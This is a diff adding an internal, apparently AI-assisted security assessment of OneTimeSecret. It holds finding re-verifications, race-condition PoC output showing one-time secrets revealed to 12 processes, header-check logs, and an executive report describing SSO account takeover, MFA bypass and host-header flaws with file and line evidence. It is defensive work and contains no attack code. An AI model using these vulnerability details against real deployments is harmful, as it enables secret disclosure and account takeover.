+- Default-config nuance: C4a (non-atomic gate) IS default-reachable (reveal is a guest route enabled by default, auth-off). C4b (test Argon2 cost) is NOT default-reachable — it requires a misconfigured RACK_ENV=test in production; boot.rb:111 defaults to production. The resolution doc honestly labels this 'Partially' default, but the risk-register/exec one-line 'Default? Yes' over-generalizes by attributing default-applicability to the whole C4 including C4b.
+- Severity Medium is defensible: C4a is a bounded (next-window-locked) over-shoot, not an unbounded bypass — the doc states this accurately and does not overclaim.
+
+### C5 — confirmed, fix sound
+C5 is a confirmed, default-config-reachable Low-severity unbounded-payload DoS; all ~10 app/lib citations resolve and support the claim, the fix is root-cause-correct and complete in scope, with one fix-side filename slip (gitignored etc/config.yaml vs the defaults file) that is minor drift, not a mispoint.
+
+Discrepancies:
+- Fix-side: config knob cited at etc/config.yaml:198-220, but etc/config.yaml is gitignored (user-override that deep-merges over etc/defaults/config.defaults.yaml); the secret_options block at those exact lines lives in the defaults file. Correct intent (deployers add overrides in etc/config.yaml), borrowed line numbers — minor drift.
+- Fix-side: manager.rb:17-23 is an unqualified abbreviation; resolves to familia gem (familia-2.11.0/lib/familia/encryption/manager.rb), not an app file. Claim (plaintext copied in memory) holds.
+- Finding-side (03 file) uses /home/user/onetimesecret/... absolute path prefixes — portable-path artifact from authoring machine; resolves fine against the worktree, not a resolution failure.
+
+### C6 — confirmed, fix sound
+C6 is accurately characterized and correctly rated Low/informational: the v1 unsalted-SHA256 key exists by default as a read-only decrypt fallback (never used for writes, no downgrade path), every load-bearing citation resolves, and the retirement fix is sound with an explicit data-loss gate and fail-closed removal.
+
+Discrepancies:
+- Minor citation drift on base_secret_action.rb:113,127 (TTL bounds) — actual values at L45/143/151; peripheral to the core claim, not a mispoint.
+- Finding-side file (03-redis-familia-crypto.md) uses /home/user/... absolute paths from the authoring environment, but the cited line (configure_familia.rb:65) is exact; path prefix is cosmetic.
+
+### AZ6 — confirmed, fix sound
+AZ6 is a real, default-reachable Low-severity internal-id leak with pixel-accurate citations and a sound, complete fix; only nit is the headline naming owner_id while custid (which can be a legacy email) leaks too.
+
+Discrepancies:
+- Exec report (00:194) and risk-register (line 40) title the finding 'exposes creator owner_id' only; the actual leak and the fix cover BOTH custid and owner_id (safe_dump_fields.rb:56-57). Finding body (02 F6) and resolution doc correctly cover both. Minor scope understatement in the headline, not the body.
+- custid is a real field via deprecated_fields.rb:25; per migration_fields.rb:13 custid in v2 data can be a legacy EMAIL address (or 'anon'), not just an opaque id. The assessment frames custid uniformly as 'internal customer id' and does not note it can be an email — a slight under-characterization (an email leak is arguably worse), but possession-gating keeps severity Low.
+
+### AZ7 — confirmed, fix sound_with_caveats
+AZ7 is fully confirmed with all finding-side and fix-side citations resolving exactly; severity Low is upheld and the fix is sound except its inviter-attribution snippet references a non-existent Customer display_name field (the doc already hedges to 'omit'), and the register's 'No' default-config flag mildly contradicts the resolution doc's 'Yes'.
+
+Discrepancies:
+- Register row marks AZ7 'No (invites)' for default-config, but the resolution doc itself says 'Affects default config? Yes (the noauth GET /api/invite/:token endpoint)'. The endpoint is reachable without auth (apps/api/invite/auth_strategies.rb:12 noauth); exploitation requires a valid invite token, so it is not out-of-the-box reachable absent an issued invite. Minor internal inconsistency between resolution doc and register, but both defensibly Low.
+- Fix snippet references Customer#display_name / safe_dump :display_name which does not exist; implementer following the snippet literally gets nil. Hedged but should be corrected to 'omit'.
+
+### AZ8 — partial, fix incomplete
+Finding citations all accurate and the model-layer mass-assignment weakness is real but unreachable today (no params-forwarding sink), so Low/NEEDS-VALIDATION is correctly calibrated; the prescribed fix is incomplete because its forbidden-fields raise would regress two of three callers (create_customer.rb, sync_session.rb) that pass role:/verified: directly into create!, which the doc overlooked.
+
+Discrepancies:
+- Fix-side blind spot: resolution doc verified only create_account.rb's caller pattern. create_customer.rb:62-68 and sync_session.rb:175-178 pass role:/verified: directly as create! kwargs, so the prescribed CREATE_FORBIDDEN_ATTRS raise would regress them — contradicting step-2's 'callers unaffected' claim.
+- NEEDS-VALIDATION resolved: no production path forwards a raw params hash or ** splat into Customer.create! (grep confirms only keyword literals); not exploitable in default config. The 'safe today' framing is correct.
+
+### AZ9 — confirmed, fix sound
+AZ9 is a real, accurately-cited gap (anonymous email-amplifying incoming endpoints with no in-app rate limit and no middleware limiter in this codebase); severity Low and default-config "No (incoming, opt-in)" are correct, and the prescribed limiter fix is sound and complete across both paths.
+
+Discrepancies:
+- NEEDS-VALIDATION resolved: no in-app or Rack/middleware rate limiter wraps the incoming routes anywhere in this codebase (grep of lib/onetime, config, apps/api/incoming clean). Whether a production reverse-proxy/WAF throttles them is deployment-specific and unverifiable from source; the finding correctly states this and the in-app fix is the right defense-in-depth regardless.
+
+### P4 — confirmed, fix unsound
+The V1 timing asymmetry is genuinely present and correctly rated Low and not-reachable-in-default-config, but the prescribed fix is unsound — Customer.dummy has no apitoken so apitoken? short-circuits, and the doc's 'expensive BCrypt' premise is wrong since V1 uses cheap secure_compare.
+
+Discrepancies:
+- Fix is unsound: Customer.dummy (customer.rb:331-340) never sets apitoken; apitoken?:263 empty-guard short-circuits before secure_compare, so the 'mirror V2/V3 dummy' fix yields no timing parity.
+- Finding+fix mischaracterize the cost: V1 apitoken? uses Rack::Utils.secure_compare (customer.rb:265), not BCrypt; the 'expensive comparison'/'~280ms BCrypt' framing (resolution lines 22-28,52, doc step 1/3) is inaccurate and overstates the timing signal.
+- Finding premise 'V2/V3 do NOT have this problem' (04-api-otto.md:162) is weakened: basic_auth_strategy.rb:57 calls apitoken? on the same dummy that lacks an apitoken, so the cited constant-time reference does not actually exercise the dummy's Argon2 hash on the apitoken path either.
+
+### P5 — confirmed, fix sound
+P5 is a real, accurately-cited Low-severity log-injection of the Basic-Auth username via OT.ld, correctly scoped as not-default-config (debug + auth must both be on, and the sink is short-circuited when auth is disabled); the fix is sound with one imprecision (base.rb:80-81 logs IP, not custid).
+
+Discrepancies:
+- Resolution doc lists base.rb:80-81 (anonymous path) as a custid log-injection site, but that branch logs only client_ipaddress and custid is nil there — overscoped, though hedged with 'for any untrusted field'.
+- helpers.rb:113 cited as a 'similar site' logs custid=cust&.custid (authenticated value) and :86 logs 'obscured', not raw attacker Basic-Auth input — weaker analogues than base.rb:67, listed as defense-in-depth not equivalent sinks.
+- Not flagged in docs but reinforces 'No (auth)': base.rb:65 returns disabled_response BEFORE the :67 log line when session_auth_enforced? is false, so the sink is unreachable when auth is OFF.
+
+### S4 — confirmed, fix sound
+S4 is accurate and well-calibrated: every citation resolves exactly, the v-html sink is real but operator-controlled and DOMPurify-mitigated (Low/defense-in-depth upheld), the fix is sound; only flaw is an internal Yes/No default-config inconsistency between register and resolution and an over-claim that the DOMPurify hook can be call-scoped.
+
+Discrepancies:
+- Internal contradiction on default-config: risk-register.md:46 marks 'Affects default config? Yes' but resolution doc header (line 5) says 'No'. Truth is nuanced: the sink ships in default config (not auth-gated) but renders nothing until an operator sets global_banner (bootstrap.ts:580 defaults null), so it is not exploitable out-of-the-box. The 'No' framing is more accurate for exploitability.
+- Resolution step 2 claims the afterSanitizeAttributes hook can be 'kept scoped to this component's sanitize call' — DOMPurify hooks are global to the singleton; not actually scopable per-call without a separate DOMPurify instance.
+
+### S5 — partial, fix sound
+All citations resolve and support their claims; S5 is correctly classified as a Low NEEDS-VALIDATION CSP-compatibility concern (not a real injection risk — the script src is a fixed vendored constant), not reachable in default config (CSP off, requires authenticated custom-domain admin flow with dns_widget flag), and the prescribed fix is sound.
+
+Discrepancies:
+- The finding-side file 05 #6 header says 'CONFIRMED behavior' while marking it NEEDS-VALIDATION; the two are reconciled correctly — the no-nonce injection is confirmed, but whether it actually breaks under CSP is the open (and likely negative) question. Not a discrepancy.
+- Not a script-injection risk: script.src is a fixed compile-time vendored constant (dnsWidgetJs), no attacker-controlled input. This is a CSP-compatibility/future-proofing concern only, as the docs correctly state.
+
+### OBS1 — confirmed, fix sound
+OBS1 is accurate, all citations resolve exactly, correctly self-classified as Info/non-default-config (double-gated to dev + DEBUG_SESSION), and the redaction+boot-guard fix is sound.
+---
+_38 findings re-verified; verify→adversarial-recheck (76 agents) + C1 runtime reproduction. 0 overturns._

--- a/docs/security/assessment-2026-06-22/README.md
+++ b/docs/security/assessment-2026-06-22/README.md
@@ -1,0 +1,28 @@
+# Security Assessment — 2026-06-22
+
+Authorized internal security review of OneTimeSecret and its supporting libraries
+(`otto`, `familia`, `rodauth`, `rodauth-omniauth`). Source review + local runtime validation.
+
+> Confidential. Intentionally not published via PR. Contains a working proof-of-concept for a
+> confirmed vulnerability. Handle per `SECURITY.md`.
+
+## Start here
+- **`findings/00-EXECUTIVE-REPORT.md`** — executive synthesis, focus-area coverage, top priorities.
+- **`risk-register.md`** — every finding ranked by severity / exploitability / business impact, with
+  a flag for whether it affects the default (out-of-the-box) configuration.
+- **`resolutions/`** — one prescribed-fix document per finding (added after the report).
+
+## Supporting material
+- `findings/01`–`06` — detailed per-area reports with `file:line` evidence.
+- `poc/` — reproduction scripts (the `race_reveal_*` and `_reveal_worker` scripts demonstrate the
+  one-time-reveal race; `headers_check.rb` dumps live security headers).
+- `evidence/` — captured PoC output (`race_poc_output.txt`, `headers_output.txt`).
+- `notes/tooling.md` — environment, tooling, and reproduction notes.
+
+## Headline
+- **Critical:** SSO email-match account takeover (gated on SSO; not yet enabled in production) — see
+  `resolutions/A1-sso-account-linking.md`, designed in concert with issue #3499.
+- **High (default-config, PoC-confirmed):** the one-time reveal/burn guarantee is not concurrency-safe
+  (12/12 parallel processes obtained the same secret) — see `resolutions/C1-one-time-reveal-atomicity.md`.
+- **High:** secure headers (CSP / X-Frame-Options / HSTS) off by default; CSRF exempt for cookie-auth
+  `/api/*` mutations; `oauth2` 2.0.18 CVE; host-header trust in auth email links.

--- a/docs/security/assessment-2026-06-22/README.md
+++ b/docs/security/assessment-2026-06-22/README.md
@@ -16,7 +16,7 @@ Authorized internal security review of OneTimeSecret and its supporting librarie
 - `findings/01`–`06` — detailed per-area reports with `file:line` evidence.
 - `poc/` — reproduction scripts (the `race_reveal_*` and `_reveal_worker` scripts demonstrate the
   one-time-reveal race; `headers_check.rb` dumps live security headers).
-- `evidence/` — captured PoC output (`race_poc_output.txt`, `headers_output.txt`).
+- `evidence/` — captured PoC output (`race_poc_output.md`, `headers_output.md`).
 - `notes/tooling.md` — environment, tooling, and reproduction notes.
 
 ## Headline

--- a/docs/security/assessment-2026-06-22/evidence/c1_fix_verification.md
+++ b/docs/security/assessment-2026-06-22/evidence/c1_fix_verification.md
@@ -1,0 +1,15 @@
+C1 fix verification — atomic one-time consume
+=============================================
+Branch: claude/fix-one-time-reveal-atomicity (worktree /home/user/ots-work-c1)
+
+Single-process sanity (claim_consumption!):
+  CLAIM=true  EXISTS_AFTER=0   (winner deletes the key atomically)
+
+Multi-process true-parallel race (12 independent processes, shared deadline),
+mirroring clustered Puma — same harness that showed 12/12 BEFORE the fix:
+  viewable=true : 12/12   (all pass the non-authoritative pre-check)
+  won=true      : 1/12    (exactly one wins the atomic claim)
+  got plaintext : 1/12    (only the winner discloses)
+
+Before fix: 12/12 obtained the plaintext (see race_poc_output.md).
+After fix : 1/12. One-time guarantee holds under concurrency.

--- a/docs/security/assessment-2026-06-22/evidence/headers_output.md
+++ b/docs/security/assessment-2026-06-22/evidence/headers_output.md
@@ -1,0 +1,69 @@
+2026-06-22 17:25:12.166913 [31mE[0m [27527:2456 class_methods.rb:278] [31mBoot[0m -- [i18n] Missing locale file: /home/user/onetimesecret/generated/locales/en.json
+2026-06-22 17:25:12.194514 [31mE[0m [27527:2456 class_methods.rb:278] [31mBoot[0m -- [init] No JSON locale files found in generated/locales/*.json
+2026-06-22 17:25:12.199156 [36mI[0m [27527:2456] [36mAuth[0m -- ╭────────────────────────────────────────────────────╮
+2026-06-22 17:25:12.199224 [36mI[0m [27527:2456] [36mAuth[0m -- │ AUTHENTICATION MODE: Simple (Core handles /auth/*) │
+2026-06-22 17:25:12.199228 [36mI[0m [27527:2456] [36mAuth[0m -- ╰────────────────────────────────────────────────────╯
+2026-06-22 17:25:13.316487 [36mI[0m [27527:2456] [36mHTTP[0m -- [middleware] ViteProxy: Using frontend proxy for /dist to http://localhost:5173
+2026-06-22 17:25:13.330730 [36mI[0m [27527:2456] [36mHTTP[0m -- {"method":"GET","path":"/api/v2/status","status":200,"duration_ms":0.97}
+
+=== GET /api/v2/status  -> HTTP 200 ===
+  content-security-policy:       <ABSENT>
+  x-frame-options:               <ABSENT>
+  strict-transport-security:     <ABSENT>
+  x-content-type-options:        nosniff
+  x-xss-protection:              1; mode=block
+  referrer-policy:               strict-origin-when-cross-origin
+  cross-origin-opener-policy:    <ABSENT>
+  access-control-allow-origin:   <ABSENT>
+  set-cookie:                    onetime.session=4bb99fb210578051fa5375efa1fe54de305e86ad03492a274f9dedc6ed1779cf
+2026-06-22 17:25:13.334528 [31mE[0m [27527:2456 lint.rb:159] [31mHTTP[0m -- Request processing failed -- {url: "http://localhost:3000/", method: "GET", ip: "127.0.0.0"} -- Exception: [31mRack::Lint::LintError: env variable HTTP_USER_AGENT has non-string value nil[0m
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/rack-3.2.6/lib/rack/lint.rb:159:in 'block in Rack::Lint::Wrapper#check_environment'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/rack-3.2.6/lib/rack/lint.rb:155:in 'Hash#each'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/rack-3.2.6/lib/rack/lint.rb:155:in 'Rack::Lint::Wrapper#check_environment'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/rack-3.2.6/lib/rack/lint.rb:90:in 'Rack::Lint::Wrapper#response'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/rack-3.2.6/lib/rack/lint.rb:16:in 'Rack::Lint#call'
+/home/user/onetimesecret/apps/web/core/middleware/vite_proxy.rb:43:in 'Core::Middleware::ViteProxy#call'
+/home/user/onetimesecret/apps/web/core/middleware/error_handling.rb:27:in 'Core::Middleware::ErrorHandling#call'
+/home/user/onetimesecret/apps/web/core/middleware/request_setup.rb:29:in 'Core::Middleware::RequestSetup#call'
+/home/user/onetimesecret/lib/onetime/middleware/security.rb:85:in 'block (2 levels) in Onetime::Middleware::Security#setup_security_middleware'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/rack-protection-4.2.1/lib/rack/protection/base.rb:53:in 'Rack::Protection::Base#call'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/rack-utf8_sanitizer-1.11.1/lib/rack/utf8_sanitizer.rb:34:in 'Rack::UTF8Sanitizer#call'
+/home/user/onetimesecret/lib/onetime/middleware/security.rb:52:in 'Onetime::Middleware::Security#call'
+/home/user/onetimesecret/lib/onetime/middleware/csrf_response_header.rb:30:in 'Onetime::Middleware::CsrfResponseHeader#call'
+/home/user/onetimesecret/lib/onetime/application/request_logger.rb:36:in 'Onetime::Application::RequestLogger#call'
+/home/user/onetimesecret/lib/onetime/middleware/domain_strategy.rb:146:in 'Onetime::Middleware::DomainStrategy#call'
+/home/user/onetimesecret/lib/middleware/i18n_locale.rb:48:in 'block in Middleware::I18nLocale#call'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/i18n-1.14.8/lib/i18n.rb:354:in 'I18n::Base#with_locale'
+/home/user/onetimesecret/lib/middleware/i18n_locale.rb:47:in 'Middleware::I18nLocale#call'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/otto-2.3.1/lib/otto/locale/middleware.rb:62:in 'Otto::Locale::Middleware#call'
+/home/user/onetimesecret/lib/onetime/middleware/identity_resolution.rb:70:in 'Onetime::Middleware::IdentityResolution#call'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/rack-session-2.1.2/lib/rack/session/abstract/id.rb:274:in 'Rack::Session::Abstract::Persisted#context'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/rack-session-2.1.2/lib/rack/session/abstract/id.rb:268:in 'Rack::Session::Abstract::Persisted#call'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/rack-parser-0.7.0/lib/rack/parser.rb:24:in 'Rack::Parser#call'
+/home/user/onetimesecret/lib/onetime/middleware/normalize_content_type.rb:57:in 'Onetime::Middleware::NormalizeContentType#call'
+/home/user/onetimesecret/lib/middleware/request_id.rb:83:in 'Rack::RequestId#call'
+/home/user/onetimesecret/lib/middleware/detect_host.rb:194:in 'Rack::DetectHost#call'
+/home/user/onetimesecret/lib/onetime/middleware/startup_readiness.rb:105:in 'Onetime::Middleware::StartupReadiness#call'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/rack-3.2.6/lib/rack/content_length.rb:20:in 'Rack::ContentLength#call'
+/home/user/onetimesecret/lib/onetime/middleware/health_access_control.rb:33:in 'Onetime::Middleware::HealthAccessControl#call'
+/home/user/onetimesecret/lib/onetime/middleware/ip_ban.rb:35:in 'Onetime::Middleware::IPBan#call'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/otto-2.3.1/lib/otto/security/middleware/ip_privacy_middleware.rb:67:in 'Otto::Security::Middleware::IPPrivacyMiddleware#call'
+/home/user/onetimesecret/lib/onetime/application/base.rb:102:in 'Onetime::Application::Base#call'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/rack-3.2.6/lib/rack/urlmap.rb:76:in 'block in Rack::URLMap#call'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/rack-3.2.6/lib/rack/urlmap.rb:60:in 'Array#each'
+/opt/rbenv/versions/3.4.9/lib/ruby/gems/3.4.0/gems/rack-3.2.6/lib/rack/urlmap.rb:60:in 'Rack::URLMap#call'
+/home/user/security-assessment/poc/headers_check.rb:29:in 'block in <main>'
+/home/user/security-assessment/poc/headers_check.rb:27:in 'Array#each'
+/home/user/security-assessment/poc/headers_check.rb:27:in '<main>'
+2026-06-22 17:25:13.395495 [31mE[0m [27527:2456 request_logger.rb:50] [31mHTTP[0m -- {"method":"GET","path":"/","status":500,"duration_ms":61.262}
+
+=== GET /  -> HTTP 500 ===
+  content-security-policy:       <ABSENT>
+  x-frame-options:               <ABSENT>
+  strict-transport-security:     <ABSENT>
+  x-content-type-options:        <ABSENT>
+  x-xss-protection:              <ABSENT>
+  referrer-policy:               <ABSENT>
+  cross-origin-opener-policy:    <ABSENT>
+  access-control-allow-origin:   <ABSENT>
+  set-cookie:                    onetime.session=0e39d7a3e9b594c689bd9a9d261b930eca64668f55659be9b38bb1a7f5140a77

--- a/docs/security/assessment-2026-06-22/evidence/race_poc_output.md
+++ b/docs/security/assessment-2026-06-22/evidence/race_poc_output.md
@@ -1,0 +1,33 @@
+########## DETERMINISTIC (barrier after viewable? gate) ##########
+[setup] created secret id=5ek73kxm1c5uu1ps…  exists=true
+[result] threads=10  passed_viewable_gate+revealed_plaintext=10  destroy!_calls=10
+[result] secret still present after run? no (consumed)
+[VULNERABLE] One-time guarantee BROKEN: the same secret's plaintext was returned to 10 concurrent callers.
+
+########## NATURAL race (NO barrier, simultaneous release, 50 threads) ##########
+[result] threads=50  passed_viewable_gate+revealed_plaintext=1  destroy!_calls=1
+[ok] plaintext returned to at most one caller.
+[result] threads=50  passed_viewable_gate+revealed_plaintext=1  destroy!_calls=1
+[ok] plaintext returned to at most one caller.
+[result] threads=50  passed_viewable_gate+revealed_plaintext=1  destroy!_calls=1
+[ok] plaintext returned to at most one caller.
+
+########## MULTI-PROCESS TRUE-PARALLELISM (models multiple Puma workers) ##########
+# 12 independent OS processes, each pre-loads the SAME secret, spin-waits to a
+# shared wall-clock deadline, then runs load->viewable?->decrypt->revealed!.
+# No shared GIL => genuine parallel execution, as in clustered Puma in production.
+created secret id: durm29vdhu6n73ojlbt4czbcgvxe2s5845jwbff9j1h43gkvinks9tz4sm8vv7
+WORKER pid=26624 viewable=true got=true
+WORKER pid=26616 viewable=true got=true
+WORKER pid=26613 viewable=true got=true
+WORKER pid=26622 viewable=true got=true
+WORKER pid=26615 viewable=true got=true
+WORKER pid=26617 viewable=true got=true
+WORKER pid=26614 viewable=true got=true
+WORKER pid=26618 viewable=true got=true
+WORKER pid=26620 viewable=true got=true
+WORKER pid=26623 viewable=true got=true
+WORKER pid=26621 viewable=true got=true
+WORKER pid=26619 viewable=true got=true
+[RESULT] 12 / 12 independent processes obtained the plaintext of the SAME one-time secret.
+[CONCLUSION] One-time guarantee broken under real concurrency (multi-worker production).

--- a/docs/security/assessment-2026-06-22/evidence/race_poc_reverify_2026-06-24.md
+++ b/docs/security/assessment-2026-06-22/evidence/race_poc_reverify_2026-06-24.md
@@ -1,0 +1,43 @@
+# C1 one-time race — re-verification evidence (2026-06-24)
+
+> Saved as `.md` (not `.txt`) because `.gitignore:5` ignores `*.txt` — which is why the
+> original assessment's `evidence/*.txt` was never committed. Captured program output below.
+
+```
+C1 one-time race — INDEPENDENT RE-VERIFICATION capture
+Date: 2026-06-24   Stack: ruby 3.4.9, familia 2.11.0, otto 2.3.1, rhales 0.7.1, Valkey :2121
+NOTE: the original assessment referenced evidence/race_poc_output.txt but it was never committed;
+      this file is a regenerated, equivalent capture produced during the 2026-06-24 re-verification.
+PoC scripts (adapted to this worktree's RACK_ENV=test config resolution; logic unchanged):
+      scratchpad/c1_race_model.rb, c1_mp_setup.rb, c1_mp_worker.rb (from docs/.../poc/race_reveal_model.rb)
+============================================================
+
+## A. Model-level barrier PoC (deterministic; models the production multi-process interleave)
+[env] familia=2.11.0 ruby=3.4.9 redis=redis://127.0.0.1:6379/0
+[setup] created secret id=2zedqjwla6rjcnvj…  exists=true
+[result] threads=10  passed_gate+got_plaintext=10  destroy!_calls=10
+[result] secret still present after run? no (consumed)
+[VULNERABLE] one-time guarantee BROKEN: same plaintext returned to 10 concurrent callers.
+
+## B. True multi-process PoC (12 independent OS processes, no shared GIL, shared consume barrier)
+[setup] secret id=ijsw0xmhav4ra8yc…  present_before=1
+[barrier] all 12 workers consume at epoch=1782350000.65
+GOT 12050 MP-RACE-CANARY-11946
+GOT 12051 MP-RACE-CANARY-11946
+GOT 12052 MP-RACE-CANARY-11946
+GOT 12053 MP-RACE-CANARY-11946
+GOT 12054 MP-RACE-CANARY-11946
+GOT 12055 MP-RACE-CANARY-11946
+GOT 12056 MP-RACE-CANARY-11946
+GOT 12057 MP-RACE-CANARY-11946
+GOT 12058 MP-RACE-CANARY-11946
+GOT 12059 MP-RACE-CANARY-11946
+GOT 12060 MP-RACE-CANARY-11946
+GOT 12061 MP-RACE-CANARY-11946
+[RESULT] independent processes that obtained the plaintext: 12 / 12
+[RESULT] secret key present after run? 0 (0 = consumed/deleted)
+
+## C. In-process full-stack PoC via the REAL /api/v2/secret/:id/reveal endpoint (GIL-bound control)
+   Expected ~1/N: within one MRI process the GIL serialises the CPU-bound reveal, masking the race.
+   (Confirms the assessment's own explanation for why a single process hid the bug.)
+```

--- a/docs/security/assessment-2026-06-22/findings/00-EXECUTIVE-REPORT.md
+++ b/docs/security/assessment-2026-06-22/findings/00-EXECUTIVE-REPORT.md
@@ -1,0 +1,257 @@
+# OneTimeSecret — Security Assessment (Findings Report)
+
+**Engagement:** Authorized deep security review of the OneTimeSecret web application and its
+supporting libraries (source + local runtime).
+**Date:** 2026-06-22  **Branch under review:** `claude/vigilant-goldberg-97ijfl` (all 5 repos)
+**Assessor role:** Application Security Engineer (defensive, synthetic data only).
+
+Repositories in scope (all reviewed):
+`onetimesecret/onetimesecret` (app), `delano/otto` (web framework), `delano/familia` (Redis ORM),
+`onetimesecret/rodauth` (auth fork), `onetimesecret/rodauth-omniauth` (SSO fork).
+
+> **Detailed evidence** for every item lives in the per-area files in this directory
+> (`01`–`06`). This document is the executive synthesis + risk register + reproduction summary.
+> The risk register is also available standalone at `../risk-register.md`.
+
+---
+
+## 1. Executive summary
+
+OneTimeSecret is a **mature, security-conscious codebase**. Cryptographic fundamentals are strong:
+secret share identifiers are 256-bit CSPRNG values with an HMAC authenticity tag (not guessable),
+secrets are encrypted at rest with authenticated encryption (AES-256-GCM / XChaCha20-Poly1305),
+fresh per-message nonces, HKDF key derivation, and ciphertext is cryptographically bound to its
+record. Passphrases use Argon2id. There is **no insecure default secret** — the app fails closed
+if `SECRET` is unset. The authorization model is a coherent entitlement system with a verified-email
+-gated admin ("colonel") role, and the otto framework's routing, dynamic-dispatch allowlisting, and
+trusted-proxy/client-IP handling are well designed.
+
+The material risk concentrates in a few areas:
+
+1. **The core "one-time" guarantee is not concurrency-safe (HIGH, PoC-confirmed).** The reveal/burn
+   flow is a non-atomic check-then-destroy. Under real parallelism (production runs multiple Puma
+   worker processes) the *same* secret can be revealed to multiple parties. **Demonstrated live:
+   12/12 independent processes obtained the plaintext of a single one-time secret.**
+2. **SSO/OIDC integration has an account-takeover path (CRITICAL) and an MFA bypass (HIGH)** — gated
+   on SSO being enabled, but serious where it is.
+3. **Secure-by-default gaps**: CSP, X-Frame-Options/clickjacking protection, and HSTS are **off by
+   default** (HIGH, live-confirmed); cookie-authenticated `/api/*` mutations are exempted from CSRF
+   token checks (HIGH).
+4. **One genuinely exploitable dependency CVE**: `oauth2` 2.0.18 bearer-token leak (HIGH), reachable
+   through the SSO login path.
+5. **Host-header trust gap** feeds password-reset / magic-link / verification email links (HIGH).
+
+Most CRITICAL/HIGH auth items are **gated on authentication or SSO being enabled** (both off in the
+default config). For the **default anonymous-sharing deployment**, the highest-impact issues are the
+one-time race (#1), the missing CSP/clickjacking/HSTS defaults (#3), and — if any logged-in features
+are used — CSRF (#3).
+
+**Tally:** 1 Critical, 8 High, ~16 Medium, ~11 Low/Info. Full list in §3.
+
+---
+
+## 2. Methodology, environment & coverage
+
+- **Source review** of all 5 repos (read-only), plus **dynamic analysis**: built Ruby 3.4.9,
+  `bundle install`, booted the real application stack in-process against a local Redis, and drove the
+  genuine otto→logic→model→Redis paths via `Rack::MockRequest` and multi-process workers.
+- **Parallelized** across six focused analysis workers (auth/session, authz/IDOR, redis/familia/crypto,
+  REST API/otto, SPA, supply chain) whose detailed outputs are files `01`–`06`. The headline race
+  finding was independently reached by both the lead assessor and the crypto worker, then confirmed
+  with a live PoC.
+- **Tooling & reproduction:** see `../notes/tooling.md` and `../poc/`. Dependency findings were
+  confirmed with `bundler-audit` (ruby-advisory-db) and `pnpm audit` against live advisory DBs.
+
+**Focus-area coverage (Definition of Done):**
+
+| # | Focus area | Covered in | Key outcome |
+|---|------------|-----------|-------------|
+| 1 | Auth & session mgmt | 01 | CRITICAL SSO takeover; HIGH MFA bypass/host-header; session store sound |
+| 2 | Authorization / IDOR / tenant | 02 | No Critical/High; Medium defense-in-depth gaps |
+| 3 | Redis-specific risks | 03 | One-time race (HIGH); Lua safe; key naming sound |
+| 4 | REST API security | 04 | HIGH CSRF-exempt prefix; rate-limit gaps; otto solid |
+| 5 | SPA security | 05 | HIGH CSP/clickjacking off-by-default; secret display safe |
+| 6 | Supply chain | 06 | HIGH oauth2 CVE; container/redis hardening |
+| 7 | Runtime & deployment | 06 | unauth Redis + host-exposed compose; source maps; secrets fail-closed |
+| 8 | Business logic | 01/02/03 | one-time race; enumeration items; incoming-email abuse |
+| 9 | Cryptography | 03 | Strong (AEAD, CSPRNG, Argon2id, HKDF, AAD); salt-default caveat |
+| 10 | Observability | 01/06 | session debug gated; Sentry scrubbing present; logging mostly safe |
+
+---
+
+## 3. Consolidated findings (risk-ranked)
+
+Severity reflects impact **when the relevant feature is enabled**. "Applicability" notes the
+precondition. IDs map to the per-area files.
+
+### CRITICAL
+
+- **[A1] SSO email-match account takeover.** `account_from_omniauth` links an SSO identity to any
+  existing local account purely by normalized email, with `omniauth_verify_account? true` and **no
+  `email_verified` claim check**. An attacker who can authenticate at a configured IdP (or tenant SSO)
+  as the victim's email — e.g. an OIDC provider that does not verify email ownership — takes over the
+  victim's existing account.
+  Evidence: `apps/web/auth/config/hooks/omniauth.rb:27-30`, `config/features/omniauth.rb:38-40`;
+  fork `rodauth-omniauth/lib/rodauth/features/omniauth.rb:58-99,151-153`. *(Detail: 01)*
+  **Applicability:** SSO/OmniAuth enabled with a provider/tenant that doesn't guarantee verified email.
+
+### HIGH
+
+- **[C1] TOCTOU race defeats the one-time guarantee — PoC-CONFIRMED.** Reveal/burn does a non-atomic
+  check-then-destroy: in-memory `state` is checked, the value is decrypted, then `destroy!` runs
+  unconditionally (no `WATCH`/Lua/`GETDEL`/lock). Two+ concurrent requests for the same secret each
+  pass the gate, decrypt, and destroy — all receive the plaintext.
+  Evidence: `lib/onetime/models/secret/features/secret_state_management.rb:60-90`;
+  `apps/api/v2/logic/secrets/reveal_secret.rb:64,95,189`; v1 `apps/api/v1/logic/secrets/show_secret.rb:27,50,71`;
+  `familia/lib/familia/horreum/persistence.rb:558` + `database_commands.rb:252,242`.
+  **Live PoC:** `../poc/race_reveal_model.rb` (deterministic 10/10) and multi-process workers
+  (`../poc/_reveal_worker.rb`) → **12/12 independent processes obtained the same secret's plaintext**
+  (`../evidence/race_poc_output.txt`). *(Detail: 03 F1)*
+  **Applicability:** default config (anonymous sharing); impact = single-use/tamper-evidence broken.
+
+- **[A2] SSO bypasses MFA unconditionally.** `via_omniauth: true` short-circuits the MFA requirement
+  before any policy override — a TOTP/WebAuthn-protected account logs in via SSO with no second factor.
+  Evidence: `apps/web/auth/config/hooks/login.rb:128-133`, `operations/detect_mfa_requirement.rb:151-156`. *(01)*
+  **Applicability:** SSO + MFA both in use.
+
+- **[A3] Host-header poisoning of reset / magic-link / verification emails.** Links are built from
